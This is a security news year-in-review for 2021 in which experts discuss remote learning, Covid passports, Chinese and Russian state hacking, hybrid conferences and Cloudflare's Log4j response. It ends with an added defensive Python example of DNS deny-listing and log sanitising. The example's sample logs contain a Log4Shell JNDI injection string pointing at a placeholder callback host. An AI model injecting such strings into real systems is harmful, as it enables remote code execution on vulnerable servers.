Key thinkers on the biggest security stories and trends in 2021

Swig Security Review 2021 - Part II

In Part I of our 2021 year in review published yesterday, experts discussed everything from the biggest ransomware attacks to why diversity is paramount to tackling the growing workforce gap.

The impact of the coronavirus pandemic was a recurrent topic, and surfaces again in Part II, as YouTube educator Katie Paxton-Fear argues that remote learning has improved accessibility across the infosec industry, a view echoed by Black Hat general manager Steve Wylie.

Other key topics include the cyber warfare landscape for 2022 and a look back at the main trends of 2021, the latter half of which was dominated by the landmark Log4j vulnerability.

Join us for Part II as we ask more security experts to sum up their 2021 and expectations for the year ahead.

Remote learning is improving diversity across the industry

Katie Paxton-Fear, cybersecurity lecturer at Manchester Metropolitan University and YouTube educator (InsiderPhD)

One thing 2021 and 2020 showed is how much we still struggle to do security ‘right’ – there’s always a trade-off between convenience, cost, and security. Covid-19 will be remembered as a time of quick change and reactivity, but this year we have settled into hybrid life.

While a lot of people will look at hybrid conferences and events and feel something is missing – the chats near the sandwich buffet table, the running into someone by the coffee shop – it’s important to realise that security has become more accessible as a result.

The current status quo has driven what is being described as the ‘great resignation’ as workers look for hybrid or remote roles.



This accessibility is enabling individuals who were interested in security to consider pursuing a career in the field, as people have been skilling up with certifications and by trying to make a bit of extra cash through bug bounty hunting.

Where suddenly the best security knowledge was restricted to those who could afford a plane ticket to Vegas for DEFCON, now all you need is a free Twitch stream.

As we see vaccines rolled out worldwide, I hope this part of the pandemic – the great equaliser if you will – sticks around. We can learn so much from the diversity in security and hybrid has really enabled personal growth.

I echo the sentiments of many governments worldwide in the wake of the pandemic – we must look towards education, and I hope those who have found a passion in security over the pandemic find a career in 2022.

The pandemic has taught us a lot about what it means to be resilient, as individuals, as businesses, as governments, and as society at large, and while we are still reeling from the past two years, combined with anxiety for the future, we can admit we don’t know what to do – but we will overcome it.

Follow Katie on Twitter.

Are Covid-19 passports here to stay?

Professor Alan Woodward, computer scientist at the University of Surrey, and expert in the privacy implications of Covid-related contact tracing

From the app/technology perspective, I think the UK Covid alert app and vaccine passport are as good as they’re going to get.

Personally I don’t see any issues with privacy from a technical perspective. The app that runs on people’s phones or mobile devices to check the Covid passport looks fine – it passes nothing that can identify the individual and is ephemeral on the scanning device anyway.

Of course, that leaves the bigger question about whether the government should be making these ‘passports’ mandatory and, to my mind, who is actually going to police this.

Behind the scenes on that Covid alert app, something very interesting happened.


Apple and Google ended up adopting some of the better parts of the NHS algorithms, while not abandoning the fundamental privacy design.

We’ve ended up with a very good piece of technology. But that technology is only as useful as the parameters set by the government.

Follow Alan on Twitter.

All eyes on China and Russia

Charity Wright, former NSA Chinese espionage expert and threat intelligence analyst at Recorded Future

We started 2021 the way we will start 2022 – with all eyes on China and Russia. Over the past several years, cybersecurity and geopolitics have become inherently intertwined, and this will be a focus for intelligence requirements going into the new year.

At the beginning of 2021, Russia had the cybersecurity industry reeling from the SolarWinds intrusion, as we determined the scope and impact of the incident across the world.

In February, Recorded Future discovered a Chinese state-sponsored group called RedEcho in the networks of India’s power grid.


A few months later, with the risks of global digital supply chains still in the spotlight, we learned that China’s Hafnium group had infiltrated Microsoft Exchange servers and pilfered data from thousands of private and public sector organizations around the world in one of the worst cyber-espionage campaigns witnessed to date.

Throughout the year, Russia-based ransomware gangs wreaked havoc on organizations everywhere, prompting President Biden to demand that President Putin make cybercriminals in Russia accountable for their actions.

But not all was lost. Crime fighters have made thousands of arrests and recovered millions in ransomware payments, governments have issued indictments, intelligence agencies are working closer with the private sector, and the general public is starting to become more aware of cybersecurity and malign foreign influence.


In 2022, geopolitical intelligence will become a new requirement for many corporations, militaries, and governments, as they become more aware of how geopolitical instability and major events like Covid-19 disrupt global business. State-sponsored cyber-attacks and influence operations will increase unless exposed and disincentivized through joint intelligence efforts and joint actions.

My guess is that the new year will start with Russia targeting Ukraine with cyber espionage operations for pre-invasion intelligence. NATO and its member countries should also be on high alert for Russian espionage.

Tensions between the US and China will continue to escalate as President Xi Jinping is emboldened by the full confidence of the Communist Party of China and Beijing’s growing list of allies in Latin America and Africa.

As China-native technology companies expand their digital presence in foreign countries, Beijing will enjoy new digital landscapes for cyber espionage objectives. Along with their Digital Silk Road projects, China will continue to use its propaganda system to push anti-US and pro-China narratives, which will contribute to Beijing’s long-term objective of creating a world more friendly to the Communist Party.

Follow Charity on Twitter.

Moving to a hybrid model has changed infosec conferences forever

Steve Wylie, general manager for Black Hat events

We are nearly two years on from the onset of Covid-19 and the global pandemic that ensued. It has been an especially difficult time for the conference business – an industry which trades on human interaction and engagement. But many conferences have also learned from this experience and adapted to continue to serve their communities in meaningful ways.

In fact, the past two years have shown us just how creative and resilient we can be. Yet the challenges we faced in 2020 seemed insurmountable at the time.

Conference organizers large and small scrambled to establish their events on virtual platforms. Some were successful – most were not.

Replicating the Black Hat experience in a digital format seemed impossible. But with a lot of planning, great partners, and a little bit of luck, we pulled it off.


Little did we know that 2020 and our year of virtual events would be just a warm-up for 2021 and the future of events.

Today, conference organizers are managing for uncertainty as the world slowly returns to in-person events. Will in-person events be allowed, and at what scale? What healthcare guidelines will be in place at the time of the event? Will our community – our speakers, trainers, delegates, and sponsors – want to meet in person or continue to participate from afar?

These are challenges we will continue to face and must plan for. But we must also embrace the benefits of digital and our learnings from these past two years.

For Black Hat, we believe our future will be in-person and virtual. Nothing beats the experience of in-person interaction and engagement. The past two years have shown us that as we isolated from co-workers, customers, family, and friends.

But virtual events also have proven merit. They expand accessibility for conference goers who cannot travel due to cost or time away from the home and office. We saw this at Black Hat USA this year with delegate representation from 140 countries compared with 112 countries at our last in-person event. Making conferences available to a global, online audience brings our communities together like never before.

Anyone who has attended a conference with multiple tracks has also faced the dilemma of choosing which sessions to miss out on. By extending conference sessions to a virtual platform, delegates can experience the whole conference at their own pace. This brings conference delegates tremendous value that they will want to keep as in-person events return.

I believe these past two years have forever changed the conference world – hopefully for the good.

Follow Steve on Twitter.

Log4j has reminded us that security doesn’t take a holiday

John Engates, field CTO at Cloudflare

The recent emergence of a vulnerability in Log4j has reminded us that security doesn’t take a holiday. The response to the Log4j CVE was rapid across the industry. At Cloudflare, we were well-positioned to help mitigate Log4Shell and buy customers some precious time.

Upon learning exactly how the Log4j vulnerability worked and how attackers could exploit it, Cloudflare immediately updated our WAF (web application firewall) rules to help protect against it.

In addition, we provided our customers with the option of sanitising any logs sent from Cloudflare to help further mitigate the Log4j vulnerability.


This was also an extremely busy year for DDoS attacks. Cloudflare mitigated record-setting HTTP DDoS attacks, terabit-strong network-layer attacks, and one of the largest botnets ever deployed (Meris).

We observed and mitigated a number of ransom DDoS attacks on voice over IP (VoIP) service providers and their network infrastructure around the world.

The threat of phishing and ransomware attacks is also a topic of great concern for most CIOs and CISOs. Zero Trust is the trend that gives me the most hope in mitigating security threats to businesses. And Zero Trust is now a part of almost every conversation with customers and prospects.

DNS may not immediately come to mind in the context of cybersecurity, but it’s a critical service to most companies. This year, some of the highest-profile outages were partially due to problems accessing DNS servers.

Companies can also use DNS to thwart cyber-attacks by preventing DNS lookups on known malware or phishing domains. Some Log4j attacks relied on DNS lookups to call home. DNS can potentially mitigate attacks like Log4Shell and others, while also providing important analytics about attacks.


More users working from home means companies now rely on the internet as a critical part of their corporate network. Increasing security-as-a-service (SaaS) adoption and continued flexible work arrangements will eventually lead CIOs to give up the idea of the traditional corporate network. We believe the internet will become the only network that matters for most users and companies in the near future.

The pandemic continued to surprise us all with the emergence of new variants. We obviously can’t predict the virus, or when people might go back to offices, so more than likely some form of a flexible work arrangement will continue.

This uncertainty will prompt CIOs to prepare for whatever work scenarios may come. As I mentioned above, the internet, Zero Trust, and SaaS will take leading roles in preparation for a future with flexible work as a given.

The internet becomes the corporate network. Zero Trust is the security architecture that helps mitigate all kinds of threats. And SaaS enables CIOs and CISOs to implement and maintain their security infrastructure during an era of supply chain constraints and a talent war.

Follow John on Twitter.
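Two of the defensive measures mentioned above, blocking DNS lookups on known-bad domains and sanitising logs before a Log4j-based consumer sees them, can be illustrated in a few lines. The following is an added example written for this review; it is not Cloudflare's code, the deny-list and log lines are constructed placeholders, and the `${` to `x{` substitution is assumed here as one simple way to neutralise Log4j's lookup syntax rather than a description of any vendor's implementation.

```python
import re

# Constructed deny-list standing in for a threat-intelligence feed of
# malware and phishing domains (placeholder names, not real indicators).
DENYLIST = {
    "malware.example",
    "phish.example.net",
}


def normalise(name):
    """Lower-case a query name and drop whitespace and a trailing dot."""
    return name.strip().rstrip(".").lower()


def is_blocked(qname, denylist=DENYLIST):
    """True if qname, or any parent domain of it, is on the deny-list.

    Walking the parents means a listing of 'malware.example' also covers
    'cdn.malware.example', which is how resolver policy is usually applied.
    """
    labels = normalise(qname).split(".")
    for i in range(len(labels)):
        if ".".join(labels[i:]) in denylist:
            return True
    return False


def resolve(qname, upstream, denylist=DENYLIST):
    """Filtering resolver: refuse listed names, otherwise ask upstream.

    `upstream` is any callable that maps a name to an answer; the returned
    dict doubles as an analytics record of what was blocked and why.
    """
    if is_blocked(qname, denylist):
        return {"qname": qname, "action": "blocked", "answer": None}
    return {"qname": qname, "action": "resolved", "answer": upstream(qname)}


# Log4j evaluates `${...}` lookups inside logged strings. Rewriting every
# opener to `x{` (assumed approach) leaves the text readable but makes it
# inert, and because every opener is rewritten it also defuses nested
# forms such as `${${lower:j}ndi:...}`.
LOOKUP_OPENER = re.compile(r"\$\{")


def sanitise_log_line(line):
    """Return the line with all `${` lookup openers neutralised."""
    return LOOKUP_OPENER.sub("x{", line)


def sanitise_logs(lines):
    """Sanitise a batch of lines; returns (clean_lines, number_changed)."""
    cleaned = [sanitise_log_line(line) for line in lines]
    changed = sum(1 for before, after in zip(lines, cleaned) if before != after)
    return cleaned, changed


# Constructed sample: three access-log lines, one carrying a lookup string
# in the User-Agent field.
SAMPLE_LOGS = [
    '203.0.113.5 - - "GET /login HTTP/1.1" 200 "Mozilla/5.0"',
    '203.0.113.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://callback.example/x}"',
    '203.0.113.7 - - "GET /health HTTP/1.1" 200 "curl/7.79"',
]

if __name__ == "__main__":
    fake_upstream = lambda name: "198.51.100.10"  # constructed answer
    for name in ("www.example.org", "cdn.malware.example", "notmalware.example"):
        print(resolve(name, fake_upstream))
    clean, n = sanitise_logs(SAMPLE_LOGS)
    print(f"{n} line(s) sanitised")
    for line in clean:
        print(line)
```

The parent-domain walk in `is_blocked` is deliberate: a flat string comparison would let `cdn.malware.example` through when only `malware.example` is listed, while a substring match would wrongly block `notmalware.example`. The sanitiser is a transport-side control for logs leaving one system for another; it does not replace patching the vulnerable library itself.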

Additional reporting by Adam Bannister, James Walker, and John Leyden.

Read Part I of the Swig Security Review 2021.